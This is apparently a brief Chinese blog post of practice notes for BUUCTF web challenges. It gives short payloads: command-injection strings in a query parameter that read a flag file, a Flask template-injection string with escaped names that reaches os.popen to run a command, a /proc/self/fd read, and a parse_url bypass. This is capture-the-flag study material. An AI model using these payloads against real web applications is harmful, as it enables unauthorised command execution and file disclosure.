Posted Updated a few seconds read (About 95 words)

buu刷题2

EasyBypass

?comm1=index.php";m4 /fla?;"
&comm2=1
?comm1=index.php";tac/fla?;"
&comm2=1

[pasecactf_2019]flask_ssti

{{config["\x5f\x5fclass\x5f\x5f"]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["os"]["popen"]("whoami")["read"]()}}

由于文件之前是有被打开过的,所以可以直接使用读取prod来读取

/proc/self/fd/3

[安洵杯 2019]iamthinking

parse_url用///public/?payload=来绕过

[CISCN2019 总决赛 Day1 Web4]Laravel1

buu刷题2

http://example.com/2022/03/13/buu刷题2/

Author

vague huang

Posted on

2022-03-13

Updated on

2022-03-14

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×